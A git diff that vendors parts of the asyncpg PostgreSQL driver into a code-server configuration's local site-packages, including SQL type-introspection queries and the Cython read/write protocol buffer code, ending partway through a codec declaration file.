ti.oid = tt.range_subtype) + OR (tt.basetype IS NOT NULL AND ti.oid = tt.basetype) +) + +SELECT DISTINCT + *, + basetype::regtype::text AS basetype_name, + elemtype::regtype::text AS elemtype_name, + range_subtype::regtype::text AS range_subtype_name +FROM + typeinfo_tree +ORDER BY + depth DESC +'''.format(typeinfo=_TYPEINFO) + + +TYPE_BY_NAME: typing.Final = '''\ +SELECT + t.oid, + t.typelem AS elemtype, + t.typtype AS kind +FROM + pg_catalog.pg_type AS t + INNER JOIN pg_catalog.pg_namespace ns ON (ns.oid = t.typnamespace) +WHERE + t.typname = $1 AND ns.nspname = $2 +''' + + +def TypeRecord( + rec: typing.Tuple[int, typing.Optional[int], bytes], +) -> protocol.Record: + assert len(rec) == 3 + return _create_record( # type: ignore + {"oid": 0, "elemtype": 1, "kind": 2}, rec) + + +# 'b' for a base type, 'd' for a domain, 'e' for enum. +SCALAR_TYPE_KINDS = (b'b', b'd', b'e') + + +def is_scalar_type(typeinfo: protocol.Record) -> bool: + return ( + typeinfo['kind'] in SCALAR_TYPE_KINDS and + not typeinfo['elemtype'] + ) + + +def is_domain_type(typeinfo: protocol.Record) -> bool: + return typeinfo['kind'] == b'd' # type: ignore[no-any-return] + + +def is_composite_type(typeinfo: protocol.Record) -> bool: + return typeinfo['kind'] == b'c' # type: ignore[no-any-return] diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/__init__.pxd b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/__init__.pxd new file mode 100755 index 0000000..1df403c --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/__init__.pxd @@ -0,0 +1,5 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/__init__.py b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/__init__.py new file mode 100755 index 0000000..1df403c --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/__init__.py @@ -0,0 +1,5 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/buffer.pxd b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/buffer.pxd new file mode 100755 index 0000000..05d62bf --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/buffer.pxd @@ -0,0 +1,143 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +from libc.stdint cimport int8_t, uint8_t, int16_t, uint16_t, \ + int32_t, uint32_t, int64_t, uint64_t + + +include "./buffer.pxi" + + +cdef class WriteBuffer: + cdef: + # Preallocated small buffer + bint _smallbuf_inuse + char _smallbuf[_BUFFER_INITIAL_SIZE] + + char *_buf + + # Allocated size + ssize_t _size + + # Length of data in the buffer + ssize_t _length + + # Number of memoryviews attached to the buffer + int _view_count + + # True is start_message was used + bint _message_mode + + cdef inline len(self): + return self._length + + cdef inline write_len_prefixed_utf8(self, str s): + return self.write_len_prefixed_bytes(s.encode('utf-8')) + + cdef inline _check_readonly(self) + cdef inline _ensure_alloced(self, ssize_t extra_length) + cdef _reallocate(self, ssize_t new_size) + cdef inline reset(self) + cdef inline start_message(self, char type) + cdef inline end_message(self) + cdef write_buffer(self, WriteBuffer buf) + cdef write_byte(self, char b) + cdef write_bytes(self, bytes data) + cdef write_len_prefixed_buffer(self, WriteBuffer buf) + cdef write_len_prefixed_bytes(self, bytes data) + cdef write_bytestring(self, bytes string) + cdef write_str(self, str string, str encoding) + cdef write_frbuf(self, FRBuffer *buf) + cdef write_cstr(self, const char *data, ssize_t len) + cdef write_int16(self, int16_t i) + cdef write_int32(self, int32_t i) + cdef write_int64(self, int64_t i) + cdef write_float(self, float f) + cdef write_double(self, double d) + + @staticmethod + cdef WriteBuffer new_message(char type) + + @staticmethod + cdef WriteBuffer new() + + +ctypedef const char * (*try_consume_message_method)(object, ssize_t*) +ctypedef int32_t (*take_message_type_method)(object, char) except -1 +ctypedef int32_t (*take_message_method)(object) except -1 +ctypedef char (*get_message_type_method)(object) + + +cdef class ReadBuffer: + cdef: + # A deque of buffers (bytes objects) + object _bufs + object _bufs_append + object _bufs_popleft + + # A pointer to the first buffer in `_bufs` + bytes _buf0 + + # A pointer to the previous first buffer + # (used to prolong the life of _buf0 when using + # methods like _try_read_bytes) + bytes _buf0_prev + + # Number of buffers in `_bufs` + int32_t _bufs_len + + # A read position in the first buffer in `_bufs` + ssize_t _pos0 + + # Length of the first buffer in `_bufs` + ssize_t _len0 + + # A total number of buffered bytes in ReadBuffer + ssize_t _length + + char _current_message_type + int32_t _current_message_len + ssize_t _current_message_len_unread + bint _current_message_ready + + cdef inline len(self): + return self._length + + cdef inline char get_message_type(self): + return self._current_message_type + + cdef inline int32_t get_message_length(self): + return self._current_message_len + + cdef feed_data(self, data) + cdef inline _ensure_first_buf(self) + cdef _switch_to_next_buf(self) + cdef inline char read_byte(self) except? -1 + cdef inline const char* _try_read_bytes(self, ssize_t nbytes) + cdef inline _read_into(self, char *buf, ssize_t nbytes) + cdef inline _read_and_discard(self, ssize_t nbytes) + cdef bytes read_bytes(self, ssize_t nbytes) + cdef bytes read_len_prefixed_bytes(self) + cdef str read_len_prefixed_utf8(self) + cdef read_uuid(self) + cdef inline int64_t read_int64(self) except? -1 + cdef inline int32_t read_int32(self) except? -1 + cdef inline int16_t read_int16(self) except? -1 + cdef inline read_null_str(self) + cdef int32_t take_message(self) except -1 + cdef inline int32_t take_message_type(self, char mtype) except -1 + cdef int32_t put_message(self) except -1 + cdef inline const char* try_consume_message(self, ssize_t* len) + cdef bytes consume_message(self) + cdef discard_message(self) + cdef int32_t redirect_messages(self, WriteBuffer buf, char mtype, int stop_at=?) + cdef bytearray consume_messages(self, char mtype) + cdef finish_message(self) + cdef inline _finish_message(self) + + @staticmethod + cdef ReadBuffer new_message_parser(object data) diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/buffer.pxi b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/buffer.pxi new file mode 100755 index 0000000..626880e --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/buffer.pxi @@ -0,0 +1,3 @@ +DEF _BUFFER_INITIAL_SIZE = 1024 +DEF _BUFFER_MAX_GROW = 65536 +DEF _BUFFER_FREELIST_SIZE = 256 diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/buffer.pyx b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/buffer.pyx new file mode 100755 index 0000000..462a51f --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/buffer.pyx @@ -0,0 +1,829 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +from libc.string cimport memcpy + +import collections + +class BufferError(Exception): + pass + +include "./buffer.pxi" + +@cython.no_gc_clear +@cython.final +@cython.freelist(_BUFFER_FREELIST_SIZE) +cdef class WriteBuffer: + + def __cinit__(self): + self._smallbuf_inuse = True + self._buf = self._smallbuf + self._size = _BUFFER_INITIAL_SIZE + self._length = 0 + self._message_mode = 0 + + def __dealloc__(self): + if self._buf is not NULL and not self._smallbuf_inuse: + cpython.PyMem_Free(self._buf) + self._buf = NULL + self._size = 0 + + if self._view_count: + raise BufferError( + 'Deallocating buffer with attached memoryviews') + + def __getbuffer__(self, Py_buffer *buffer, int flags): + self._view_count += 1 + + cpython.PyBuffer_FillInfo( + buffer, self, self._buf, self._length, + 1, # read-only + flags) + + def __releasebuffer__(self, Py_buffer *buffer): + self._view_count -= 1 + + cdef inline _check_readonly(self): + if self._view_count: + raise BufferError('the buffer is in read-only mode') + + cdef inline _ensure_alloced(self, ssize_t extra_length): + cdef ssize_t new_size = extra_length + self._length + + if new_size > self._size: + self._reallocate(new_size) + + cdef _reallocate(self, ssize_t new_size): + cdef char *new_buf + + if new_size < _BUFFER_MAX_GROW: + new_size = _BUFFER_MAX_GROW + else: + # Add a little extra + new_size += _BUFFER_INITIAL_SIZE + + if self._smallbuf_inuse: + new_buf = cpython.PyMem_Malloc( + sizeof(char) * new_size) + if new_buf is NULL: + self._buf = NULL + self._size = 0 + self._length = 0 + raise MemoryError + memcpy(new_buf, self._buf, self._size) + self._size = new_size + self._buf = new_buf + self._smallbuf_inuse = False + else: + new_buf = cpython.PyMem_Realloc( + self._buf, new_size) + if new_buf is NULL: + cpython.PyMem_Free(self._buf) + self._buf = NULL + self._size = 0 + self._length = 0 + raise MemoryError + self._buf = new_buf + self._size = new_size + + cdef inline start_message(self, char type): + if self._length != 0: + raise BufferError( + 'cannot start_message for a non-empty buffer') + self._ensure_alloced(5) + self._message_mode = 1 + self._buf[0] = type + self._length = 5 + + cdef inline end_message(self): + # "length-1" to exclude the message type byte + cdef ssize_t mlen = self._length - 1 + + self._check_readonly() + if not self._message_mode: + raise BufferError( + 'end_message can only be called with start_message') + if self._length < 5: + raise BufferError('end_message: buffer is too small') + if mlen > _MAXINT32: + raise BufferError('end_message: message is too large') + + hton.pack_int32(&self._buf[1], mlen) + return self + + cdef inline reset(self): + self._length = 0 + self._message_mode = 0 + + cdef write_buffer(self, WriteBuffer buf): + self._check_readonly() + + if not buf._length: + return + + self._ensure_alloced(buf._length) + memcpy(self._buf + self._length, + buf._buf, + buf._length) + self._length += buf._length + + cdef write_byte(self, char b): + self._check_readonly() + + self._ensure_alloced(1) + self._buf[self._length] = b + self._length += 1 + + cdef write_bytes(self, bytes data): + cdef char* buf + cdef ssize_t len + + cpython.PyBytes_AsStringAndSize(data, &buf, &len) + self.write_cstr(buf, len) + + cdef write_bytestring(self, bytes string): + cdef char* buf + cdef ssize_t len + + cpython.PyBytes_AsStringAndSize(string, &buf, &len) + # PyBytes_AsStringAndSize returns a null-terminated buffer, + # but the null byte is not counted in len. hence the + 1 + self.write_cstr(buf, len + 1) + + cdef write_str(self, str string, str encoding): + self.write_bytestring(string.encode(encoding)) + + cdef write_len_prefixed_buffer(self, WriteBuffer buf): + # Write a length-prefixed (not NULL-terminated) bytes sequence. + self.write_int32(buf.len()) + self.write_buffer(buf) + + cdef write_len_prefixed_bytes(self, bytes data): + # Write a length-prefixed (not NULL-terminated) bytes sequence. + cdef: + char *buf + ssize_t size + + cpython.PyBytes_AsStringAndSize(data, &buf, &size) + if size > _MAXINT32: + raise BufferError('string is too large') + # `size` does not account for the NULL at the end. + self.write_int32(size) + self.write_cstr(buf, size) + + cdef write_frbuf(self, FRBuffer *buf): + cdef: + ssize_t buf_len = buf.len + if buf_len > 0: + self.write_cstr(frb_read_all(buf), buf_len) + + cdef write_cstr(self, const char *data, ssize_t len): + self._check_readonly() + self._ensure_alloced(len) + + memcpy(self._buf + self._length, data, len) + self._length += len + + cdef write_int16(self, int16_t i): + self._check_readonly() + self._ensure_alloced(2) + + hton.pack_int16(&self._buf[self._length], i) + self._length += 2 + + cdef write_int32(self, int32_t i): + self._check_readonly() + self._ensure_alloced(4) + + hton.pack_int32(&self._buf[self._length], i) + self._length += 4 + + cdef write_int64(self, int64_t i): + self._check_readonly() + self._ensure_alloced(8) + + hton.pack_int64(&self._buf[self._length], i) + self._length += 8 + + cdef write_float(self, float f): + self._check_readonly() + self._ensure_alloced(4) + + hton.pack_float(&self._buf[self._length], f) + self._length += 4 + + cdef write_double(self, double d): + self._check_readonly() + self._ensure_alloced(8) + + hton.pack_double(&self._buf[self._length], d) + self._length += 8 + + @staticmethod + cdef WriteBuffer new_message(char type): + cdef WriteBuffer buf + buf = WriteBuffer.__new__(WriteBuffer) + buf.start_message(type) + return buf + + @staticmethod + cdef WriteBuffer new(): + cdef WriteBuffer buf + buf = WriteBuffer.__new__(WriteBuffer) + return buf + + +@cython.no_gc_clear +@cython.final +@cython.freelist(_BUFFER_FREELIST_SIZE) +cdef class ReadBuffer: + + def __cinit__(self): + self._bufs = collections.deque() + self._bufs_append = self._bufs.append + self._bufs_popleft = self._bufs.popleft + self._bufs_len = 0 + self._buf0 = None + self._buf0_prev = None + self._pos0 = 0 + self._len0 = 0 + self._length = 0 + + self._current_message_type = 0 + self._current_message_len = 0 + self._current_message_len_unread = 0 + self._current_message_ready = 0 + + cdef feed_data(self, data): + cdef: + ssize_t dlen + bytes data_bytes + + if not cpython.PyBytes_CheckExact(data): + if cpythonx.PyByteArray_CheckExact(data): + # ProactorEventLoop in Python 3.10+ seems to be sending + # bytearray objects instead of bytes. Handle this here + # to avoid duplicating this check in every data_received(). + data = bytes(data) + else: + raise BufferError( + 'feed_data: a bytes or bytearray object expected') + + # Uncomment the below code to test code paths that + # read single int/str/bytes sequences are split over + # multiple received buffers. + # + # ll = 107 + # if len(data) > ll: + # self.feed_data(data[:ll]) + # self.feed_data(data[ll:]) + # return + + data_bytes = data + + dlen = cpython.Py_SIZE(data_bytes) + if dlen == 0: + # EOF? + return + + self._bufs_append(data_bytes) + self._length += dlen + + if self._bufs_len == 0: + # First buffer + self._len0 = dlen + self._buf0 = data_bytes + + self._bufs_len += 1 + + cdef inline _ensure_first_buf(self): + if PG_DEBUG: + if self._len0 == 0: + raise BufferError('empty first buffer') + if self._length == 0: + raise BufferError('empty buffer') + + if self._pos0 == self._len0: + self._switch_to_next_buf() + + cdef _switch_to_next_buf(self): + # The first buffer is fully read, discard it + self._bufs_popleft() + self._bufs_len -= 1 + + # Shouldn't fail, since we've checked that `_length >= 1` + # in _ensure_first_buf() + self._buf0_prev = self._buf0 + self._buf0 = self._bufs[0] + + self._pos0 = 0 + self._len0 = len(self._buf0) + + if PG_DEBUG: + if self._len0 < 1: + raise BufferError( + 'debug: second buffer of ReadBuffer is empty') + + cdef inline const char* _try_read_bytes(self, ssize_t nbytes): + # Try to read *nbytes* from the first buffer. + # + # Returns pointer to data if there is at least *nbytes* + # in the buffer, NULL otherwise. + # + # Important: caller must call _ensure_first_buf() prior + # to calling try_read_bytes, and must not overread + + cdef: + const char *result + + if PG_DEBUG: + if nbytes > self._length: + return NULL + + if self._current_message_ready: + if self._current_message_len_unread < nbytes: + return NULL + + if self._pos0 + nbytes <= self._len0: + result = cpython.PyBytes_AS_STRING(self._buf0) + result += self._pos0 + self._pos0 += nbytes + self._length -= nbytes + if self._current_message_ready: + self._current_message_len_unread -= nbytes + return result + else: + return NULL + + cdef inline _read_into(self, char *buf, ssize_t nbytes): + cdef: + ssize_t nread + char *buf0 + + while True: + buf0 = cpython.PyBytes_AS_STRING(self._buf0) + + if self._pos0 + nbytes > self._len0: + nread = self._len0 - self._pos0 + memcpy(buf, buf0 + self._pos0, nread) + self._pos0 = self._len0 + self._length -= nread + nbytes -= nread + buf += nread + self._ensure_first_buf() + + else: + memcpy(buf, buf0 + self._pos0, nbytes) + self._pos0 += nbytes + self._length -= nbytes + break + + cdef inline _read_and_discard(self, ssize_t nbytes): + cdef: + ssize_t nread + + self._ensure_first_buf() + while True: + if self._pos0 + nbytes > self._len0: + nread = self._len0 - self._pos0 + self._pos0 = self._len0 + self._length -= nread + nbytes -= nread + self._ensure_first_buf() + + else: + self._pos0 += nbytes + self._length -= nbytes + break + + cdef bytes read_bytes(self, ssize_t nbytes): + cdef: + bytes result + ssize_t nread + const char *cbuf + char *buf + + self._ensure_first_buf() + cbuf = self._try_read_bytes(nbytes) + if cbuf != NULL: + return cpython.PyBytes_FromStringAndSize(cbuf, nbytes) + + if nbytes > self._length: + raise BufferError( + 'not enough data to read {} bytes'.format(nbytes)) + + if self._current_message_ready: + self._current_message_len_unread -= nbytes + if self._current_message_len_unread < 0: + raise BufferError('buffer overread') + + result = cpython.PyBytes_FromStringAndSize(NULL, nbytes) + buf = cpython.PyBytes_AS_STRING(result) + self._read_into(buf, nbytes) + return result + + cdef bytes read_len_prefixed_bytes(self): + cdef int32_t size = self.read_int32() + if size < 0: + raise BufferError( + 'negative length for a len-prefixed bytes value') + if size == 0: + return b'' + return self.read_bytes(size) + + cdef str read_len_prefixed_utf8(self): + cdef: + int32_t size + const char *cbuf + + size = self.read_int32() + if size < 0: + raise BufferError( + 'negative length for a len-prefixed bytes value') + + if size == 0: + return '' + + self._ensure_first_buf() + cbuf = self._try_read_bytes(size) + if cbuf != NULL: + return cpython.PyUnicode_DecodeUTF8(cbuf, size, NULL) + else: + return self.read_bytes(size).decode('utf-8') + + cdef read_uuid(self): + cdef: + bytes mem + const char *cbuf + + self._ensure_first_buf() + cbuf = self._try_read_bytes(16) + if cbuf != NULL: + return pg_uuid_from_buf(cbuf) + else: + return pg_UUID(self.read_bytes(16)) + + cdef inline char read_byte(self) except? -1: + cdef const char *first_byte + + if PG_DEBUG: + if not self._buf0: + raise BufferError( + 'debug: first buffer of ReadBuffer is empty') + + self._ensure_first_buf() + first_byte = self._try_read_bytes(1) + if first_byte is NULL: + raise BufferError('not enough data to read one byte') + + return first_byte[0] + + cdef inline int64_t read_int64(self) except? -1: + cdef: + bytes mem + const char *cbuf + + self._ensure_first_buf() + cbuf = self._try_read_bytes(8) + if cbuf != NULL: + return hton.unpack_int64(cbuf) + else: + mem = self.read_bytes(8) + return hton.unpack_int64(cpython.PyBytes_AS_STRING(mem)) + + cdef inline int32_t read_int32(self) except? -1: + cdef: + bytes mem + const char *cbuf + + self._ensure_first_buf() + cbuf = self._try_read_bytes(4) + if cbuf != NULL: + return hton.unpack_int32(cbuf) + else: + mem = self.read_bytes(4) + return hton.unpack_int32(cpython.PyBytes_AS_STRING(mem)) + + cdef inline int16_t read_int16(self) except? -1: + cdef: + bytes mem + const char *cbuf + + self._ensure_first_buf() + cbuf = self._try_read_bytes(2) + if cbuf != NULL: + return hton.unpack_int16(cbuf) + else: + mem = self.read_bytes(2) + return hton.unpack_int16(cpython.PyBytes_AS_STRING(mem)) + + cdef inline read_null_str(self): + if not self._current_message_ready: + raise BufferError( + 'read_null_str only works when the message guaranteed ' + 'to be in the buffer') + + cdef: + ssize_t pos + ssize_t nread + bytes result + const char *buf + const char *buf_start + + self._ensure_first_buf() + + buf_start = cpython.PyBytes_AS_STRING(self._buf0) + buf = buf_start + self._pos0 + while buf - buf_start < self._len0: + if buf[0] == 0: + pos = buf - buf_start + nread = pos - self._pos0 + buf = self._try_read_bytes(nread + 1) + if buf != NULL: + return cpython.PyBytes_FromStringAndSize(buf, nread) + else: + break + else: + buf += 1 + + result = b'' + while True: + pos = self._buf0.find(b'\x00', self._pos0) + if pos >= 0: + result += self._buf0[self._pos0 : pos] + nread = pos - self._pos0 + 1 + self._pos0 = pos + 1 + self._length -= nread + + self._current_message_len_unread -= nread + if self._current_message_len_unread < 0: + raise BufferError( + 'read_null_str: buffer overread') + + return result + + else: + result += self._buf0[self._pos0:] + nread = self._len0 - self._pos0 + self._pos0 = self._len0 + self._length -= nread + + self._current_message_len_unread -= nread + if self._current_message_len_unread < 0: + raise BufferError( + 'read_null_str: buffer overread') + + self._ensure_first_buf() + + cdef int32_t take_message(self) except -1: + cdef: + const char *cbuf + + if self._current_message_ready: + return 1 + + if self._current_message_type == 0: + if self._length < 1: + return 0 + self._ensure_first_buf() + cbuf = self._try_read_bytes(1) + if cbuf == NULL: + raise BufferError( + 'failed to read one byte on a non-empty buffer') + self._current_message_type = cbuf[0] + + if self._current_message_len == 0: + if self._length < 4: + return 0 + + self._ensure_first_buf() + cbuf = self._try_read_bytes(4) + if cbuf != NULL: + self._current_message_len = hton.unpack_int32(cbuf) + else: + self._current_message_len = self.read_int32() + + self._current_message_len_unread = self._current_message_len - 4 + + if self._length < self._current_message_len_unread: + return 0 + + self._current_message_ready = 1 + return 1 + + cdef inline int32_t take_message_type(self, char mtype) except -1: + cdef const char *buf0 + + if self._current_message_ready: + return self._current_message_type == mtype + elif self._length >= 1: + self._ensure_first_buf() + buf0 = cpython.PyBytes_AS_STRING(self._buf0) + + return buf0[self._pos0] == mtype and self.take_message() + else: + return 0 + + cdef int32_t put_message(self) except -1: + if not self._current_message_ready: + raise BufferError( + 'cannot put message: no message taken') + self._current_message_ready = False + return 0 + + cdef inline const char* try_consume_message(self, ssize_t* len): + cdef: + ssize_t buf_len + const char *buf + + if not self._current_message_ready: + return NULL + + self._ensure_first_buf() + buf_len = self._current_message_len_unread + buf = self._try_read_bytes(buf_len) + if buf != NULL: + len[0] = buf_len + self._finish_message() + return buf + + cdef discard_message(self): + if not self._current_message_ready: + raise BufferError('no message to discard') + if self._current_message_len_unread > 0: + self._read_and_discard(self._current_message_len_unread) + self._current_message_len_unread = 0 + self._finish_message() + + cdef bytes consume_message(self): + if not self._current_message_ready: + raise BufferError('no message to consume') + if self._current_message_len_unread > 0: + mem = self.read_bytes(self._current_message_len_unread) + else: + mem = b'' + self._finish_message() + return mem + + cdef int32_t redirect_messages(self, WriteBuffer buf, char mtype, + int stop_at=0): + # Redirects messages from self into buf until either + # a message with a type different than mtype is encountered, or + # buf contains stop_at bytes. + # Returns the number of messages redirected. + + if not self._current_message_ready: + raise BufferError( + 'consume_full_messages called on a buffer without a ' + 'complete first message') + if mtype != self._current_message_type: + raise BufferError( + 'consume_full_messages called with a wrong mtype') + if self._current_message_len_unread != self._current_message_len - 4: + raise BufferError( + 'consume_full_messages called on a partially read message') + + cdef: + const char* cbuf + ssize_t cbuf_len + int32_t msg_len + ssize_t new_pos0 + ssize_t pos_delta + int32_t done + int32_t count + + count = 0 + while True: + count += 1 + buf.write_byte(mtype) + buf.write_int32(self._current_message_len) + + cbuf = self.try_consume_message(&cbuf_len) + if cbuf != NULL: + buf.write_cstr(cbuf, cbuf_len) + else: + buf.write_bytes(self.consume_message()) + + if self._length > 0: + self._ensure_first_buf() + else: + return count + + if stop_at and buf._length >= stop_at: + return count + + # Fast path: exhaust buf0 as efficiently as possible. + if self._pos0 + 5 <= self._len0: + cbuf = cpython.PyBytes_AS_STRING(self._buf0) + new_pos0 = self._pos0 + cbuf_len = self._len0 + + done = 0 + # Scan the first buffer and find the position of the + # end of the last "mtype" message. + while new_pos0 + 5 <= cbuf_len: + if (cbuf + new_pos0)[0] != mtype: + done = 1 + break + if (stop_at and + (buf._length + new_pos0 - self._pos0) > stop_at): + done = 1 + break + msg_len = hton.unpack_int32(cbuf + new_pos0 + 1) + 1 + if new_pos0 + msg_len > cbuf_len: + break + new_pos0 += msg_len + count += 1 + + if new_pos0 != self._pos0: + assert self._pos0 < new_pos0 <= self._len0 + + pos_delta = new_pos0 - self._pos0 + buf.write_cstr( + cbuf + self._pos0, + pos_delta + ) + + self._pos0 = new_pos0 + self._length -= pos_delta + + assert self._length >= 0 + + if done: + # The next message is of a different type. + return count + + # Back to slow path. + if not self.take_message_type(mtype): + return count + + cdef bytearray consume_messages(self, char mtype): + """Consume consecutive messages of the same type.""" + cdef: + char *buf + ssize_t nbytes + ssize_t total_bytes = 0 + bytearray result + + if not self.take_message_type(mtype): + return None + + # consume_messages is a volume-oriented method, so + # we assume that the remainder of the buffer will contain + # messages of the requested type. + result = cpythonx.PyByteArray_FromStringAndSize(NULL, self._length) + buf = cpythonx.PyByteArray_AsString(result) + + while self.take_message_type(mtype): + self._ensure_first_buf() + nbytes = self._current_message_len_unread + self._read_into(buf, nbytes) + buf += nbytes + total_bytes += nbytes + self._finish_message() + + # Clamp the result to an actual size read. + cpythonx.PyByteArray_Resize(result, total_bytes) + + return result + + cdef finish_message(self): + if self._current_message_type == 0 or not self._current_message_ready: + # The message has already been finished (e.g by consume_message()), + # or has been put back by put_message(). + return + + if self._current_message_len_unread: + if PG_DEBUG: + mtype = chr(self._current_message_type) + + discarded = self.consume_message() + + if PG_DEBUG: + print('!!! discarding message {!r} unread data: {!r}'.format( + mtype, + discarded)) + + self._finish_message() + + cdef inline _finish_message(self): + self._current_message_type = 0 + self._current_message_len = 0 + self._current_message_ready = 0 + self._current_message_len_unread = 0 + + @staticmethod + cdef ReadBuffer new_message_parser(object data): + cdef ReadBuffer buf + + buf = ReadBuffer.__new__(ReadBuffer) + buf.feed_data(data) + + buf._current_message_ready = 1 + buf._current_message_len_unread = buf._len0 + + return buf diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/__init__.pxd b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/__init__.pxd new file mode 100755 index 0000000..67e20b8 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/__init__.pxd @@ -0,0 +1,159 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +cdef class CodecContext: + + cpdef get_text_codec(self) + cdef is_encoding_utf8(self) + cpdef get_json_decoder(self) + cdef is_decoding_json(self) + cpdef get_json_encoder(self) + cdef is_encoding_json(self) + + +ctypedef object (*encode_func)(CodecContext settings, + WriteBuffer buf, + object obj) + +ctypedef object (*decode_func)(CodecContext settings, + FRBuffer *buf) + + +# Datetime +cdef date_encode(CodecContext settings, WriteBuffer buf, obj) +cdef date_decode(CodecContext settings, FRBuffer * buf) +cdef date_encode_tuple(CodecContext settings, WriteBuffer buf, obj) +cdef date_decode_tuple(CodecContext settings, FRBuffer * buf) +cdef timestamp_encode(CodecContext settings, WriteBuffer buf, obj) +cdef timestamp_decode(CodecContext settings, FRBuffer * buf) +cdef timestamp_encode_tuple(CodecContext settings, WriteBuffer buf, obj) +cdef timestamp_decode_tuple(CodecContext settings, FRBuffer * buf) +cdef timestamptz_encode(CodecContext settings, WriteBuffer buf, obj) +cdef timestamptz_decode(CodecContext settings, FRBuffer * buf) +cdef time_encode(CodecContext settings, WriteBuffer buf, obj) +cdef time_decode(CodecContext settings, FRBuffer * buf) +cdef time_encode_tuple(CodecContext settings, WriteBuffer buf, obj) +cdef time_decode_tuple(CodecContext settings, FRBuffer * buf) +cdef timetz_encode(CodecContext settings, WriteBuffer buf, obj) +cdef timetz_decode(CodecContext settings, FRBuffer * buf) +cdef timetz_encode_tuple(CodecContext settings, WriteBuffer buf, obj) +cdef timetz_decode_tuple(CodecContext settings, FRBuffer * buf) +cdef interval_encode(CodecContext settings, WriteBuffer buf, obj) +cdef interval_decode(CodecContext settings, FRBuffer * buf) +cdef interval_encode_tuple(CodecContext settings, WriteBuffer buf, tuple obj) +cdef interval_decode_tuple(CodecContext settings, FRBuffer * buf) + + +# Bits +cdef bits_encode(CodecContext settings, WriteBuffer wbuf, obj) +cdef bits_decode(CodecContext settings, FRBuffer * buf) + + +# Bools +cdef bool_encode(CodecContext settings, WriteBuffer buf, obj) +cdef bool_decode(CodecContext settings, FRBuffer * buf) + + +# Geometry +cdef box_encode(CodecContext settings, WriteBuffer wbuf, obj) +cdef box_decode(CodecContext settings, FRBuffer * buf) +cdef line_encode(CodecContext settings, WriteBuffer wbuf, obj) +cdef line_decode(CodecContext settings, FRBuffer * buf) +cdef lseg_encode(CodecContext settings, WriteBuffer wbuf, obj) +cdef lseg_decode(CodecContext settings, FRBuffer * buf) +cdef point_encode(CodecContext settings, WriteBuffer wbuf, obj) +cdef point_decode(CodecContext settings, FRBuffer * buf) +cdef path_encode(CodecContext settings, WriteBuffer wbuf, obj) +cdef path_decode(CodecContext settings, FRBuffer * buf) +cdef poly_encode(CodecContext settings, WriteBuffer wbuf, obj) +cdef poly_decode(CodecContext settings, FRBuffer * buf) +cdef circle_encode(CodecContext settings, WriteBuffer wbuf, obj) +cdef circle_decode(CodecContext settings, FRBuffer * buf) + + +# Hstore +cdef hstore_encode(CodecContext settings, WriteBuffer buf, obj) +cdef hstore_decode(CodecContext settings, FRBuffer * buf) + + +# Ints +cdef int2_encode(CodecContext settings, WriteBuffer buf, obj) +cdef int2_decode(CodecContext settings, FRBuffer * buf) +cdef int4_encode(CodecContext settings, WriteBuffer buf, obj) +cdef int4_decode(CodecContext settings, FRBuffer * buf) +cdef uint4_encode(CodecContext settings, WriteBuffer buf, obj) +cdef uint4_decode(CodecContext settings, FRBuffer * buf) +cdef int8_encode(CodecContext settings, WriteBuffer buf, obj) +cdef int8_decode(CodecContext settings, FRBuffer * buf) +cdef uint8_encode(CodecContext settings, WriteBuffer buf, obj) +cdef uint8_decode(CodecContext settings, FRBuffer * buf) + + +# Floats +cdef float4_encode(CodecContext settings, WriteBuffer buf, obj) +cdef float4_decode(CodecContext settings, FRBuffer * buf) +cdef float8_encode(CodecContext settings, WriteBuffer buf, obj) +cdef float8_decode(CodecContext settings, FRBuffer * buf) + + +# JSON +cdef jsonb_encode(CodecContext settings, WriteBuffer buf, obj) +cdef jsonb_decode(CodecContext settings, FRBuffer * buf) +cdef json_encode(CodecContext settings, WriteBuffer buf, obj) +cdef json_decode(CodecContext settings, FRBuffer *buf) + + +# JSON path +cdef jsonpath_encode(CodecContext settings, WriteBuffer buf, obj) +cdef jsonpath_decode(CodecContext settings, FRBuffer * buf) + + +# Text +cdef as_pg_string_and_size( + CodecContext settings, obj, char **cstr, ssize_t *size) +cdef text_encode(CodecContext settings, WriteBuffer buf, obj) +cdef text_decode(CodecContext settings, FRBuffer * buf) + +# Bytea +cdef bytea_encode(CodecContext settings, WriteBuffer wbuf, obj) +cdef bytea_decode(CodecContext settings, FRBuffer * buf) + + +# UUID +cdef uuid_encode(CodecContext settings, WriteBuffer wbuf, obj) +cdef uuid_decode(CodecContext settings, FRBuffer * buf) + + +# 